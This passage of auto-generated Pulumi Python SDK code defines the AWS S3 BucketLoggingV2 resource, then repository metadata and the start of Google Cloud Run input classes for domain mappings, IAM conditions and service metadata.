@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter(name="targetBucket")
def target_bucket(self) -> pulumi.Input[str]:
"""
The bucket where you want Amazon S3 to store server access logs.
"""
return pulumi.get(self, "target_bucket")
@target_bucket.setter
def target_bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "target_bucket", value)
@property
@pulumi.getter(name="targetPrefix")
def target_prefix(self) -> pulumi.Input[str]:
"""
A prefix for all log object keys.
"""
return pulumi.get(self, "target_prefix")
@target_prefix.setter
def target_prefix(self, value: pulumi.Input[str]):
pulumi.set(self, "target_prefix", value)
@property
@pulumi.getter(name="expectedBucketOwner")
def expected_bucket_owner(self) -> Optional[pulumi.Input[str]]:
"""
The account ID of the expected bucket owner.
"""
return pulumi.get(self, "expected_bucket_owner")
@expected_bucket_owner.setter
def expected_bucket_owner(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_bucket_owner", value)
@property
@pulumi.getter(name="targetGrants")
def target_grants(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]]:
"""
Set of configuration blocks with information for granting permissions documented below.
"""
return pulumi.get(self, "target_grants")
@target_grants.setter
def target_grants(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]]):
pulumi.set(self, "target_grants", value)
@pulumi.input_type
class _BucketLoggingV2State:
def __init__(__self__, *,
bucket: Optional[pulumi.Input[str]] = None,
expected_bucket_owner: Optional[pulumi.Input[str]] = None,
target_bucket: Optional[pulumi.Input[str]] = None,
target_grants: Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]] = None,
target_prefix: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering BucketLoggingV2 resources.
:param pulumi.Input[str] bucket: The name of the bucket.
:param pulumi.Input[str] expected_bucket_owner: The account ID of the expected bucket owner.
:param pulumi.Input[str] target_bucket: The bucket where you want Amazon S3 to store server access logs.
:param pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]] target_grants: Set of configuration blocks with information for granting permissions documented below.
:param pulumi.Input[str] target_prefix: A prefix for all log object keys.
"""
if bucket is not None:
pulumi.set(__self__, "bucket", bucket)
if expected_bucket_owner is not None:
pulumi.set(__self__, "expected_bucket_owner", expected_bucket_owner)
if target_bucket is not None:
pulumi.set(__self__, "target_bucket", target_bucket)
if target_grants is not None:
pulumi.set(__self__, "target_grants", target_grants)
if target_prefix is not None:
pulumi.set(__self__, "target_prefix", target_prefix)
@property
@pulumi.getter
def bucket(self) -> Optional[pulumi.Input[str]]:
"""
The name of the bucket.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter(name="expectedBucketOwner")
def expected_bucket_owner(self) -> Optional[pulumi.Input[str]]:
"""
The account ID of the expected bucket owner.
"""
return pulumi.get(self, "expected_bucket_owner")
@expected_bucket_owner.setter
def expected_bucket_owner(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_bucket_owner", value)
@property
@pulumi.getter(name="targetBucket")
def target_bucket(self) -> Optional[pulumi.Input[str]]:
"""
The bucket where you want Amazon S3 to store server access logs.
"""
return pulumi.get(self, "target_bucket")
@target_bucket.setter
def target_bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_bucket", value)
@property
@pulumi.getter(name="targetGrants")
def target_grants(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]]:
"""
Set of configuration blocks with information for granting permissions documented below.
"""
return pulumi.get(self, "target_grants")
@target_grants.setter
def target_grants(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BucketLoggingV2TargetGrantArgs']]]]):
pulumi.set(self, "target_grants", value)
@property
@pulumi.getter(name="targetPrefix")
def target_prefix(self) -> Optional[pulumi.Input[str]]:
"""
A prefix for all log object keys.
"""
return pulumi.get(self, "target_prefix")
@target_prefix.setter
def target_prefix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target_prefix", value)
class BucketLoggingV2(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket: Optional[pulumi.Input[str]] = None,
expected_bucket_owner: Optional[pulumi.Input[str]] = None,
target_bucket: Optional[pulumi.Input[str]] = None,
target_grants: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]]] = None,
target_prefix: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a S3 bucket logging resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example_bucket_v2 = aws.s3.BucketV2("exampleBucketV2")
example_bucket_acl_v2 = aws.s3.BucketAclV2("exampleBucketAclV2",
bucket=example_bucket_v2.id,
acl="private")
log_bucket = aws.s3.BucketV2("logBucket")
log_bucket_acl = aws.s3.BucketAclV2("logBucketAcl",
bucket=log_bucket.id,
acl="log-delivery-write")
example_bucket_logging_v2 = aws.s3.BucketLoggingV2("exampleBucketLoggingV2",
bucket=example_bucket_v2.id,
target_bucket=log_bucket.id,
target_prefix="log/")
```
## Import
S3 bucket logging can be imported using the `bucket` e.g.,
```sh
$ pulumi import aws:s3/bucketLoggingV2:BucketLoggingV2 example bucket-name
```
In addition, S3 bucket logging can be imported using the `bucket` and `expected_bucket_owner` separated by a comma (`,`) e.g.,
```sh
$ pulumi import aws:s3/bucketLoggingV2:BucketLoggingV2 example bucket-name,123456789012
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket: The name of the bucket.
:param pulumi.Input[str] expected_bucket_owner: The account ID of the expected bucket owner.
:param pulumi.Input[str] target_bucket: The bucket where you want Amazon S3 to store server access logs.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]] target_grants: Set of configuration blocks with information for granting permissions documented below.
:param pulumi.Input[str] target_prefix: A prefix for all log object keys.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: BucketLoggingV2Args,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Provides a S3 bucket logging resource.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
example_bucket_v2 = aws.s3.BucketV2("exampleBucketV2")
example_bucket_acl_v2 = aws.s3.BucketAclV2("exampleBucketAclV2",
bucket=example_bucket_v2.id,
acl="private")
log_bucket = aws.s3.BucketV2("logBucket")
log_bucket_acl = aws.s3.BucketAclV2("logBucketAcl",
bucket=log_bucket.id,
acl="log-delivery-write")
example_bucket_logging_v2 = aws.s3.BucketLoggingV2("exampleBucketLoggingV2",
bucket=example_bucket_v2.id,
target_bucket=log_bucket.id,
target_prefix="log/")
```
## Import
S3 bucket logging can be imported using the `bucket` e.g.,
```sh
$ pulumi import aws:s3/bucketLoggingV2:BucketLoggingV2 example bucket-name
```
In addition, S3 bucket logging can be imported using the `bucket` and `expected_bucket_owner` separated by a comma (`,`) e.g.,
```sh
$ pulumi import aws:s3/bucketLoggingV2:BucketLoggingV2 example bucket-name,123456789012
```
:param str resource_name: The name of the resource.
:param BucketLoggingV2Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(BucketLoggingV2Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
bucket: Optional[pulumi.Input[str]] = None,
expected_bucket_owner: Optional[pulumi.Input[str]] = None,
target_bucket: Optional[pulumi.Input[str]] = None,
target_grants: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]]] = None,
target_prefix: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = BucketLoggingV2Args.__new__(BucketLoggingV2Args)
if bucket is None and not opts.urn:
raise TypeError("Missing required property 'bucket'")
__props__.__dict__["bucket"] = bucket
__props__.__dict__["expected_bucket_owner"] = expected_bucket_owner
if target_bucket is None and not opts.urn:
raise TypeError("Missing required property 'target_bucket'")
__props__.__dict__["target_bucket"] = target_bucket
__props__.__dict__["target_grants"] = target_grants
if target_prefix is None and not opts.urn:
raise TypeError("Missing required property 'target_prefix'")
__props__.__dict__["target_prefix"] = target_prefix
super(BucketLoggingV2, __self__).__init__(
'aws:s3/bucketLoggingV2:BucketLoggingV2',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
bucket: Optional[pulumi.Input[str]] = None,
expected_bucket_owner: Optional[pulumi.Input[str]] = None,
target_bucket: Optional[pulumi.Input[str]] = None,
target_grants: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]]] = None,
target_prefix: Optional[pulumi.Input[str]] = None) -> 'BucketLoggingV2':
"""
Get an existing BucketLoggingV2 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] bucket: The name of the bucket.
:param pulumi.Input[str] expected_bucket_owner: The account ID of the expected bucket owner.
:param pulumi.Input[str] target_bucket: The bucket where you want Amazon S3 to store server access logs.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['BucketLoggingV2TargetGrantArgs']]]] target_grants: Set of configuration blocks with information for granting permissions documented below.
:param pulumi.Input[str] target_prefix: A prefix for all log object keys.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _BucketLoggingV2State.__new__(_BucketLoggingV2State)
__props__.__dict__["bucket"] = bucket
__props__.__dict__["expected_bucket_owner"] = expected_bucket_owner
__props__.__dict__["target_bucket"] = target_bucket
__props__.__dict__["target_grants"] = target_grants
__props__.__dict__["target_prefix"] = target_prefix
return BucketLoggingV2(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def bucket(self) -> pulumi.Output[str]:
"""
The name of the bucket.
"""
return pulumi.get(self, "bucket")
@property
@pulumi.getter(name="expectedBucketOwner")
def expected_bucket_owner(self) -> pulumi.Output[Optional[str]]:
"""
The account ID of the expected bucket owner.
"""
return pulumi.get(self, "expected_bucket_owner")
@property
@pulumi.getter(name="targetBucket")
def target_bucket(self) -> pulumi.Output[str]:
"""
The bucket where you want Amazon S3 to store server access logs.
"""
return pulumi.get(self, "target_bucket")
@property
@pulumi.getter(name="targetGrants")
def target_grants(self) -> pulumi.Output[Optional[Sequence['outputs.BucketLoggingV2TargetGrant']]]:
"""
Set of configuration blocks with information for granting permissions documented below.
"""
return pulumi.get(self, "target_grants")
@property
@pulumi.getter(name="targetPrefix")
def target_prefix(self) -> pulumi.Output[str]:
"""
A prefix for all log object keys.
"""
return pulumi.get(self, "target_prefix")
| 42.892421
| 206
| 0.657698
| 1,978
| 17,543
| 5.597068
| 0.093023
| 0.081474
| 0.068287
| 0.053654
| 0.840033
| 0.817632
| 0.807244
| 0.774094
| 0.766778
| 0.752145
| 0
| 0.009116
| 0.243345
| 17,543
| 408
| 207
| 42.997549
| 0.824921
| 0.331357
| 0
| 0.642512
| 1
| 0
| 0.134018
| 0.050009
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154589
| false
| 0.004831
| 0.033816
| 0
| 0.280193
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
314bef5e2f0e84ab8d6fc3ce1f8c6357517861c8
| 89,932
|
py
|
Python
|
sdk/python/pulumi_gcp/cloudrun/_inputs.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/cloudrun/_inputs.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_gcp/cloudrun/_inputs.py
|
pjbizon/pulumi-gcp
|
0d09cbc1dcf50093a177531f7596c27db11a2e58
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'DomainMappingMetadataArgs',
'DomainMappingSpecArgs',
'DomainMappingStatusArgs',
'DomainMappingStatusConditionArgs',
'DomainMappingStatusResourceRecordArgs',
'IamBindingConditionArgs',
'IamMemberConditionArgs',
'ServiceMetadataArgs',
'ServiceStatusArgs',
'ServiceStatusConditionArgs',
'ServiceTemplateArgs',
'ServiceTemplateMetadataArgs',
'ServiceTemplateSpecArgs',
'ServiceTemplateSpecContainerArgs',
'ServiceTemplateSpecContainerEnvArgs',
'ServiceTemplateSpecContainerEnvFromArgs',
'ServiceTemplateSpecContainerEnvFromConfigMapRefArgs',
'ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs',
'ServiceTemplateSpecContainerEnvFromSecretRefArgs',
'ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs',
'ServiceTemplateSpecContainerEnvValueFromArgs',
'ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs',
'ServiceTemplateSpecContainerPortArgs',
'ServiceTemplateSpecContainerResourcesArgs',
'ServiceTemplateSpecContainerVolumeMountArgs',
'ServiceTemplateSpecVolumeArgs',
'ServiceTemplateSpecVolumeSecretArgs',
'ServiceTemplateSpecVolumeSecretItemArgs',
'ServiceTrafficArgs',
]
@pulumi.input_type
class DomainMappingMetadataArgs:
def __init__(__self__, *,
namespace: pulumi.Input[str],
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
generation: Optional[pulumi.Input[int]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_version: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
uid: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] namespace: In Cloud Run the namespace must be equal to either the
project ID or project number.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations is a key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata. More
info: http://kubernetes.io/docs/user-guide/annotations
**Note**: The Cloud Run API may add additional annotations that were not provided in your config.
If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
:param pulumi.Input[int] generation: -
A sequence number representing a specific generation of the desired state.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and routes.
More info: http://kubernetes.io/docs/user-guide/labels
:param pulumi.Input[str] resource_version: -
An opaque value that represents the internal version of this object that
can be used by clients to determine when objects have changed. May be used
for optimistic concurrency, change detection, and the watch operation on a
resource or set of resources. They may only be valid for a
particular resource or set of resources.
More info:
https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param pulumi.Input[str] self_link: -
SelfLink is a URL representing this object.
:param pulumi.Input[str] uid: -
UID is a unique id generated by the server on successful creation of a resource and is not
allowed to change on PUT operations.
More info: http://kubernetes.io/docs/user-guide/identifiers#uids
"""
pulumi.set(__self__, "namespace", namespace)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if generation is not None:
pulumi.set(__self__, "generation", generation)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter
def namespace(self) -> pulumi.Input[str]:
"""
In Cloud Run the namespace must be equal to either the
project ID or project number.
"""
return pulumi.get(self, "namespace")
@namespace.setter
def namespace(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations is a key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata. More
info: http://kubernetes.io/docs/user-guide/annotations
**Note**: The Cloud Run API may add additional annotations that were not provided in your config.
If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def generation(self) -> Optional[pulumi.Input[int]]:
"""
-
A sequence number representing a specific generation of the desired state.
"""
return pulumi.get(self, "generation")
@generation.setter
def generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "generation", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and routes.
More info: http://kubernetes.io/docs/user-guide/labels
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[pulumi.Input[str]]:
"""
-
An opaque value that represents the internal version of this object that
can be used by clients to determine when objects have changed. May be used
for optimistic concurrency, change detection, and the watch operation on a
resource or set of resources. They may only be valid for a
particular resource or set of resources.
More info:
https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@resource_version.setter
def resource_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_version", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
-
SelfLink is a URL representing this object.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter
def uid(self) -> Optional[pulumi.Input[str]]:
"""
-
UID is a unique id generated by the server on successful creation of a resource and is not
allowed to change on PUT operations.
More info: http://kubernetes.io/docs/user-guide/identifiers#uids
"""
return pulumi.get(self, "uid")
@uid.setter
def uid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "uid", value)
@pulumi.input_type
class DomainMappingSpecArgs:
def __init__(__self__, *,
route_name: pulumi.Input[str],
certificate_mode: Optional[pulumi.Input[str]] = None,
force_override: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] route_name: The name of the Cloud Run Service that this DomainMapping applies to.
The route must exist.
:param pulumi.Input[str] certificate_mode: The mode of the certificate.
Default value is `AUTOMATIC`.
Possible values are `NONE` and `AUTOMATIC`.
:param pulumi.Input[bool] force_override: If set, the mapping will override any mapping set before this spec was set.
It is recommended that the user leaves this empty to receive an error
warning about a potential conflict and only set it once the respective UI
has given such a warning.
"""
pulumi.set(__self__, "route_name", route_name)
if certificate_mode is not None:
pulumi.set(__self__, "certificate_mode", certificate_mode)
if force_override is not None:
pulumi.set(__self__, "force_override", force_override)
@property
@pulumi.getter(name="routeName")
def route_name(self) -> pulumi.Input[str]:
"""
The name of the Cloud Run Service that this DomainMapping applies to.
The route must exist.
"""
return pulumi.get(self, "route_name")
@route_name.setter
def route_name(self, value: pulumi.Input[str]):
pulumi.set(self, "route_name", value)
@property
@pulumi.getter(name="certificateMode")
def certificate_mode(self) -> Optional[pulumi.Input[str]]:
"""
The mode of the certificate.
Default value is `AUTOMATIC`.
Possible values are `NONE` and `AUTOMATIC`.
"""
return pulumi.get(self, "certificate_mode")
@certificate_mode.setter
def certificate_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "certificate_mode", value)
@property
@pulumi.getter(name="forceOverride")
def force_override(self) -> Optional[pulumi.Input[bool]]:
"""
If set, the mapping will override any mapping set before this spec was set.
It is recommended that the user leaves this empty to receive an error
warning about a potential conflict and only set it once the respective UI
has given such a warning.
"""
return pulumi.get(self, "force_override")
@force_override.setter
def force_override(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_override", value)
@pulumi.input_type
class DomainMappingStatusArgs:
def __init__(__self__, *,
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusConditionArgs']]]] = None,
mapped_route_name: Optional[pulumi.Input[str]] = None,
observed_generation: Optional[pulumi.Input[int]] = None,
resource_records: Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusResourceRecordArgs']]]] = None):
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
if mapped_route_name is not None:
pulumi.set(__self__, "mapped_route_name", mapped_route_name)
if observed_generation is not None:
pulumi.set(__self__, "observed_generation", observed_generation)
if resource_records is not None:
pulumi.set(__self__, "resource_records", resource_records)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusConditionArgs']]]]:
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@property
@pulumi.getter(name="mappedRouteName")
def mapped_route_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "mapped_route_name")
@mapped_route_name.setter
def mapped_route_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mapped_route_name", value)
@property
@pulumi.getter(name="observedGeneration")
def observed_generation(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "observed_generation")
@observed_generation.setter
def observed_generation(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "observed_generation", value)
@property
@pulumi.getter(name="resourceRecords")
def resource_records(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusResourceRecordArgs']]]]:
return pulumi.get(self, "resource_records")
@resource_records.setter
def resource_records(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DomainMappingStatusResourceRecordArgs']]]]):
pulumi.set(self, "resource_records", value)
@pulumi.input_type
class DomainMappingStatusConditionArgs:
def __init__(__self__, *,
message: Optional[pulumi.Input[str]] = None,
reason: Optional[pulumi.Input[str]] = None,
status: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
if message is not None:
pulumi.set(__self__, "message", message)
if reason is not None:
pulumi.set(__self__, "reason", reason)
if status is not None:
pulumi.set(__self__, "status", status)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def reason(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "reason")
@reason.setter
def reason(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "reason", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class DomainMappingStatusResourceRecordArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
rrdata: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: Name should be a [verified](https://support.google.com/webmasters/answer/9008080) domain
"""
if name is not None:
pulumi.set(__self__, "name", name)
if rrdata is not None:
pulumi.set(__self__, "rrdata", rrdata)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name should be a [verified](https://support.google.com/webmasters/answer/9008080) domain
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def rrdata(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "rrdata")
@rrdata.setter
def rrdata(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rrdata", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class IamBindingConditionArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
title: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "title", title)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class IamMemberConditionArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
title: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "title", title)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class ServiceMetadataArgs:
def __init__(__self__, *,
annotations: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
generation: Optional[pulumi.Input[int]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
namespace: Optional[pulumi.Input[str]] = None,
resource_version: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
uid: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] annotations: Annotations is a key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata. More
info: http://kubernetes.io/docs/user-guide/annotations
**Note**: The Cloud Run API may add additional annotations that were not provided in your config.
If the provider plan shows a diff where a server-side annotation is added, you can add it to your config
or apply the lifecycle.ignore_changes rule to the metadata.0.annotations field.
Cloud Run (fully managed) uses the following annotation keys to configure features on a Service:
- `run.googleapis.com/ingress` sets the [ingress settings](https://cloud.google.com/sdk/gcloud/reference/run/deploy#--ingress)
for the Service. For example, `"run.googleapis.com/ingress" = "all"`.
:param pulumi.Input[int] generation: -
A sequence number representing a specific generation of the desired state.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and routes.
More info: http://kubernetes.io/docs/user-guide/labels
:param pulumi.Input[str] namespace: In Cloud Run the namespace must be equal to either the
project ID or project number.
:param pulumi.Input[str] resource_version: -
An opaque value that represents the internal version of this object that
can be used by clients to determine when objects have changed. May be used
for optimistic concurrency, change detection, and the watch operation on a
resource or set of resources. They may only be valid for a
particular resource or set of resources.
More info:
https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param pulumi.Input[str] self_link: -
SelfLink is a URL representing this object.
:param pulumi.Input[str] uid: -
UID is a unique id generated by the server on successful creation of a resource and is not
allowed to change on PUT operations.
More info: http://kubernetes.io/docs/user-guide/identifiers#uids
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if generation is not None:
pulumi.set(__self__, "generation", generation)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Annotations is a key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata. More
